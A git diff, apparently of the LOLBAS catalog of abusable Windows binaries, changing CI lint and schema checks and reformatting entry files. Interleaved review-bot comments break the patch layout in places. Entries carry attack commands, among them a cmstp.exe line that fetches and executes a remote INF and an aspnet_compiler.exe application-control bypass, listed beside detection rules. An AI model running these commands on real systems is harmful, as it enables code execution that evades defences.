diff --git a/.github/.yamllint b/.github/.yamllint
index 10d94dd..7452167 100644
--- a/.github/.yamllint
+++ b/.github/.yamllint
@@ -4,12 +4,12 @@ yaml-files:
 - '*.yml'
 rules:
 new-line-at-end-of-file:
- level: warning
+ level: error
 trailing-spaces:
- level: warning
+ level: error
 line-length:
 level: warning
 new-lines:
- level: warning
+ level: error
 indentation:
- level: warning
+ level: error
diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml
index 4e1a7c3..039ba1b 100644
--- a/.github/workflows/gh-pages.yml
+++ b/.github/workflows/gh-pages.yml
@@ -16,7 +16,7 @@ jobs:
 - name: Change .yml to .md
 run: |
- for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done
+ for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done
 mv yml/OSBinaries yml/Binaries
 mv yml/OSLibraries yml/Libraries
 mv yml/OSScripts yml/Scripts
diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml
index 7b71b07..70d7678 100644
--- a/.github/workflows/yaml-linting.yml
+++ b/.github/workflows/yaml-linting.yml
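Review bot: The changed `run:` line still iterates over `$(find yml/ -name '*.yml')`, which word-splits find's output, so a file name containing whitespace or glob characters becomes several bogus paths and the new `echo "---" >> "$x"` then creates stray files instead of appending to the intended one. Let find drive the loop instead: `find yml/ -name '*.yml' -print0 | while IFS= read -r -d '' x; do echo "---" >> "$x"; mv "$x" "${x%.yml}.md"; done`. The appended `---` also assumes every source file already ends with a newline; the `new-line-at-end-of-file: error` promotion in `.github/.yamllint` enforces that only for files the lint job scans, so a comment on this step explaining why the separator is appended here (the trailing `---` is being stripped from the yml files in this same commit) would help the next reader.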
@@ -1,19 +1,35 @@
 ---
-name: YAML Lint
-on:
- push:
- branches:
- - master
- pull_request:
- branches:
- - master
+name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
+on: [push,pull_request]
 jobs:
 lintFiles:
 runs-on: ubuntu-latest
 steps:
- - uses: actions/checkout@v1
+ - uses: actions/checkout@v3
 - name: yaml-lint
 uses: ibiqlik/action-yamllint@v3
 with:
+ no_warnings: true
+ file_or_dir: yml/**/*.yml
 config_file: .github/.yamllint
+ - name: Validate OSBinaries YAML Schema
+ uses: cketti/action-pykwalify@v0.3-temp-fix
+ with:
+ files: yml/OSBinaries/*.yml
+ schema: YML-Schema.yml
+ - name: Validate OSLibraries YAML Schema
+ uses: cketti/action-pykwalify@v0.3-temp-fix
+ with:
+ files: yml/OSLibraries/*.yml
+ schema: YML-Schema.yml
+ - name: Validate OSScripts YAML Schema
+ uses: cketti/action-pykwalify@v0.3-temp-fix
+ with:
+ files: yml/OSScripts/*.yml
+ schema: YML-Schema.yml
+ - name: Validate OtherMSBinaries YAML Schema
+ uses: cketti/action-pykwalify@v0.3-temp-fix
+ with:
+ files: yml/OtherMSBinaries/*.yml
+ schema: YML-Schema.yml
diff --git a/.github/yaml-lint-reviewdog.yml.bak b/.github/yaml-lint-reviewdog.yml.bak
new file mode 100644
index 0000000..500f25c
--- /dev/null
+++ b/.github/yaml-lint-reviewdog.yml.bak
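Review bot: The four new `uses: cketti/action-pykwalify@v0.3-temp-fix` steps and `ibiqlik/action-yamllint@v3` reference third-party actions by mutable tag, and a tag called `-temp-fix` on a personal fork is exactly the kind of reference that can be moved or deleted underneath the workflow; pin each to a full commit SHA with the tag kept as a comment, e.g. `uses: cketti/action-pykwalify@<commit-sha>  # v0.3-temp-fix`. The workflow also declares no `permissions:` block, so the job's token gets the repository default even though lint and schema checks only need to read the checkout; add `permissions:` / `  contents: read` at the top level next to `name:`. Note that `on: [push,pull_request]` drops the previous `branches: [master]` filter, so every branch push now runs this job, which is fine for a lint job but worth stating in the workflow name or a comment.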
@@ -0,0 +1,35 @@
+---
+name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
+on: [pull_request]
+
+jobs:
+ lintFiles:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ - name: Run yamllint
+ uses: reviewdog/action-yamllint@v1
+ with:
+ level: error
+ reporter: github-pr-review # Change reporter.
+ yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
+ - name: Validate OSBinaries YAML Schema
+ uses: cketti/action-pykwalify@v0.3-temp-fix
+ with:
+ files: yml/OSBinaries/*.yml
+ schema: YML-Schema.yml
+ - name: Validate OSLibraries YAML Schema
+ uses: cketti/action-pykwalify@v0.3-temp-fix
+ with:
+ files: yml/OSLibraries/*.yml
+ schema: YML-Schema.yml
+ - name: Validate OSScripts YAML Schema
+ uses: cketti/action-pykwalify@v0.3-temp-fix
+ with:
+ files: yml/OSScripts/*.yml
+ schema: YML-Schema.yml
+ - name: Validate OtherMSBinaries YAML Schema
+ uses: cketti/action-pykwalify@v0.3-temp-fix
+ with:
+ files: yml/OtherMSBinaries/*.yml
+ schema: YML-Schema.yml
diff --git a/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml b/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml
index 5e5b5da..d6a530b 100644
--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml
@@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
 - Person: Pierre-Alexandre Braeken
 Handle: '@pabraeken'
----
diff --git a/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml b/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml
index a95c37f..50c121b 100644
--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml
@@ -23,4 +23,3 @@ Resources:
 Acknowledgement:
 - Person: Bart
 Handle: '@bartblaze'
----
diff --git a/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml b/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml
index c6b5dc5..929443e 100644
--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml
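Review bot: `.github/yaml-lint-reviewdog.yml.bak` sits outside `.github/workflows/` and carries a `.bak` suffix, so GitHub never runs it; committing it leaves a second copy of the four pykwalify steps that will drift from `yaml-linting.yml`. If it is kept as a reference, a leading comment such as `# Inactive: kept for reference only; the live workflow is .github/workflows/yaml-linting.yml` should say so, otherwise drop it from the tree. If it is ever re-enabled, `reporter: github-pr-review` needs a token that can post review comments, which a `pull_request` run from a fork is not granted, so the step would fail for exactly the contributors it is meant to help.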
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml
@@ -15,4 +15,3 @@ Full_Path:
 - Path: '%localappdata%\Whatsapp\Update.exe'
 Detection:
 - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
----
diff --git a/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml b/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml
index 2a93285..0ca821f 100644
--- a/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml
@@ -25,4 +25,3 @@ Acknowledgement:
 Handle: '@@vysecurity'
 - Person: Adam (Internals)
 Handle: '@Hexacorn'
----
diff --git a/YML-Schema.yml b/YML-Schema.yml
new file mode 100644
index 0000000..dc3f775
--- /dev/null
+++ b/YML-Schema.yml
@@ -0,0 +1,118 @@
+---
+type: map
+mapping:
+# Id field enhancement possibility commenting out for now
+# "Id":
+# type: str
+# required: true
+# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
+ "Name":
+ type: str
+ required: true
+ "Description":
+ type: str
+ required: true
+ "Aliases":
+ type: seq
+ required: false
+ sequence:
+ - type: map
+ mapping:
+ "Alias":
+ type: str
+ required: false
+ "Author":
+ type: str
+ required: true
+ "Created":
+ type: date
+ required: true
+ "Commands":
+ type: seq
+ required: true
+ sequence:
+ - type: map
+ mapping:
+ "Command":
+ type: str
+ required: true
+ "Description":
+ type: str
+ required: true
+ "Usecase":
+ type: str
+ required: true
+ "Category":
+ type: str
+ required: true
+ enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
+ "Privileges":
+ type: str
+ required: true
+ "MitreID":
+ type: str
+ required: true
+ pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
+ "OperatingSystem":
+ type: str
+ required: true
+ "Full_Path":
+ type: seq
+ required: true
+ sequence:
+ - type: map
+ mapping:
+ "Path":
+ type: str
+ required: true
+ "Code_Sample":
+ type: seq
+ required: false
+ sequence:
+ - type: map
+ mapping:
+ "Code":
+ type: str
+ "Detection":
+ type: seq
+ required: false
+ sequence:
+ - type: map
+ mapping:
+ "IOC":
+ type: str
+ "Sigma":
+ type: str
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ "Analysis":
+ type: str
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ "Elastic":
+ type: str
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ "Splunk":
+ type: str
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ "BlockRule":
+ type: str
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ "Resources":
+ type: seq
+ required: false
+ sequence:
+ - type: map
+ mapping:
+ "Link":
+ type: str
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ "Acknowledgement":
+ type: seq
+ required: false
+ sequence:
+ - type: map
+ mapping:
+ "Person":
+ type: str
+ "Handle":
+ type: str
+ pattern: '^(@(\w){1,15})?$'
diff --git a/YML-Template.yml b/YML-Template.yml
index 8556fd6..ea4a2ac 100644
--- a/YML-Template.yml
+++ b/YML-Template.yml
@@ -6,6 +6,8 @@ Created: YYYY-MM-DD (date the person created this file)
 Commands:
 - Command: The command
 Description: Description of the command
+ Aliases:
+ - An alias for the command (example: ProcDump.exe & ProcDump64.exe)
 Usecase: A description of the usecase
 Category: Execute
 Privileges: Required privs
diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml
index a7aa5b5..df1e405 100644
--- a/yml/OSBinaries/AppInstaller.yml
+++ b/yml/OSBinaries/AppInstaller.yml
@@ -20,4 +20,3 @@ Resources:
 Acknowledgement:
 - Person: Wade Hickey
 Handle: '@notwhickey'
----
diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml
index dc4cf74..df6283e 100644
--- a/yml/OSBinaries/Aspnet_Compiler.yml
+++ b/yml/OSBinaries/Aspnet_Compiler.yml
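Review bot: The URL `pattern` pasted six times (Sigma, Analysis, Elastic, Splunk, BlockRule, Link) relies on the class `[$-_@.&+#]`, where `$-_` is a character range (0x24–0x5F) that silently admits `/`, `:`, `?`, `=`, `[`, `]`, `\`, `<`, `>`, digits and uppercase letters, so the class is far more permissive than it reads, and anyone later "tightening" it by reordering the characters will change what the validator accepts. Document that once, e.g. `# NOTE: "$-_" is a range 0x24-0x5F (covers / : ? = [ ] \ and A-Z), not three literal characters`, and define the expression a single time with an anchor (`pattern: &url_pattern '...'` on the first use, `pattern: *url_pattern` on the rest) if pykwalify's loader resolves aliases, which is worth confirming before relying on it. Separately, `Handle` is typed `str` with a pattern that permits the empty string, but tracked files such as `At.yml` and `Csc.yml` carry a bare `Handle:`, which YAML loads as null rather than `""`; whether pykwalify accepts null for an optional `str` should be checked before this schema gates pull requests.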
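Review bot: The new `Aliases:` entry in `YML-Template.yml` is placed inside a `Commands:` item (between `Description` and `Usecase`), but `YML-Schema.yml` added in this same commit declares `Aliases` as a top-level key beside `Name`/`Description`, and the per-command `mapping` lists no `Aliases` key; pykwalify rejects keys a `map` does not declare, so a file written from this template would fail the new schema step. Either move the template's two lines to the top level after `Description:`, or add `"Aliases"` (with `type: seq`, `required: false`) to the `Commands` item mapping in the schema, so that the template and the schema describe the same document.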
@@ -1,28 +1,27 @@ ---- -Name: Aspnet_Compiler.exe -Description: ASP.NET Compilation Tool -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u - Description: Execute C# code with the Build Provider and proper folder structure in place. - Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10 -Full_Path: - - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -Code_Sample: - - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml -Resources: - - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ - - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 -Acknowledgement: - - Person: cpl - Handle: '@cpl3h' ---- +--- +Name: Aspnet_Compiler.exe +Description: ASP.NET Compilation Tool +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u + Description: Execute C# code with the Build Provider and proper folder structure in place. 
+ Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10 +Full_Path: + - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe +Code_Sample: + - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml +Resources: + - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ + - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 +Acknowledgement: + - Person: cpl + Handle: '@cpl3h' diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index c0b81bd..30df729 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -23,7 +23,7 @@ Detection: - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. Resources: - Link: https://freddiebarrsmith.com/at.txt - - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator + - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems Acknowledgement: - Person: 'Freddie Barr-Smith' @@ -34,4 +34,3 @@ Acknowledgement: Handle: - Person: 'Xabier Ugarte-Pedrero' Handle: ---- diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 45ffc5f..d04185e 100644 --- a/yml/OSBinaries/Atbroker.yml 
+++ b/yml/OSBinaries/Atbroker.yml @@ -14,17 +14,14 @@ Commands: Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe -Code_Sample: -- Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml - - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration - - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs - - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware + - Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml + - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration + - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs + - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware Resources: - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ Acknowledgement: - Person: Adam Handle: '@hexacorn' ---- diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 338a5d8..1a3a7b9 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -48,4 +48,3 @@ Acknowledgement: Handle: '@aionescu' - Person: Asif Matadar Handle: '@d1r4c' ---- diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index 9a6f56b..a6f9a94 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml 
@@ -46,7 +46,7 @@ Detection: - IOC: bitsadmin creates new files - IOC: bitsadmin adds data to alternate data stream Resources: - - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53 + - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: @@ -56,4 +56,3 @@ Acknowledgement: Handle: '@carnal0wnage' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index eb2328d..fc183f6 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Ensar Samil Handle: '@sblmsrsn' ---- diff --git a/yml/OSBinaries/Certreq.yml b/yml/OSBinaries/Certreq.yml index 2d60a37..5f42615 100644 --- a/yml/OSBinaries/Certreq.yml +++ b/yml/OSBinaries/Certreq.yml @@ -32,4 +32,3 @@ Resources: Acknowledgement: - Person: David Middlehurst Handle: '@dtmsecurity' ---- diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index be67802..2f937a5 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -75,4 +75,3 @@ Acknowledgement: - Person: egre55 Handle: '@egre55' - Person: Lior Adar ---- diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index c67db32..9501541 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml 
@@ -21,17 +21,14 @@ Commands: Full_Path: - Path: C:\Windows\System32\cmd.exe - Path: C:\Windows\SysWOW64\cmd.exe -Code_Sample: -- Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - - IOC: cmd.exe executing files from alternate data streams. - - IOC: cmd.exe creating/modifying file contents in an alternate data stream. + - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml + - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml + - IOC: cmd.exe executing files from alternate data streams. + - IOC: cmd.exe creating/modifying file contents in an alternate data stream. Resources: - Link: https://twitter.com/yeyint_mth/status/1143824979139579904 Acknowledgement: - Person: r0lan Handle: '@yeyint_mth' ---- diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index 90ef75d..0192125 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml 
@@ -14,14 +14,11 @@ Commands: Full_Path: - Path: C:\Windows\System32\cmdkey.exe - Path: C:\Windows\SysWOW64\cmdkey.exe -Code_Sample: -- Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml Resources: - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey Acknowledgement: - Person: Handle: ---- diff --git a/yml/OSBinaries/Cmdl32.yml b/yml/OSBinaries/Cmdl32.yml index 275827c..47a87c9 100644 --- a/yml/OSBinaries/Cmdl32.yml +++ b/yml/OSBinaries/Cmdl32.yml @@ -23,4 +23,3 @@ Resources: Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 0f00d4e..1d34d11 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml 
@@ -14,24 +14,22 @@ Commands: - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. - Category: AwL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe -Code_Sample: - - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml - - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml - - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - - IOC: Execution of cmstp.exe without a VPN use case is suspicious - - IOC: DotNet CLR libraries loaded into cmstp.exe - - IOC: DotNet CLR Usage Log - cmstp.exe.log + - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml + - Splunk: 
https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml + - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml + - IOC: Execution of cmstp.exe without a VPN use case is suspicious + - IOC: DotNet CLR libraries loaded into cmstp.exe + - IOC: DotNet CLR Usage Log - cmstp.exe.log Resources: - Link: https://twitter.com/NickTyrer/status/958450014111633408 - Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 @@ -44,4 +42,3 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: Nick Tyrer Handle: '@NickTyrer' ---- diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index 286db84..a433c69 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -29,4 +29,3 @@ Resources: Acknowledgement: - Person: Ialle Teixeira Handle: '@NtSetDefault' ---- diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index 0ed5c87..cc27bc7 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -24,4 +24,3 @@ Acknowledgement: Handle: '@hexacorn' - Person: Wietze Handle: '@wietze' ---- diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 148aa25..5e92572 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml 
@@ -15,16 +15,16 @@ Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - - IOC: Control.exe executing files from alternate data streams - - IOC: Control.exe executing library file without cpl extension - - IOC: Suspicious network connections from control.exe + - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml + - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml + - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml + - IOC: Control.exe 
executing files from alternate data streams + - IOC: Control.exe executing library file without cpl extension + - IOC: Suspicious network connections from control.exe Resources: - Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ - Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index 44d7da9..53606f6 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml 
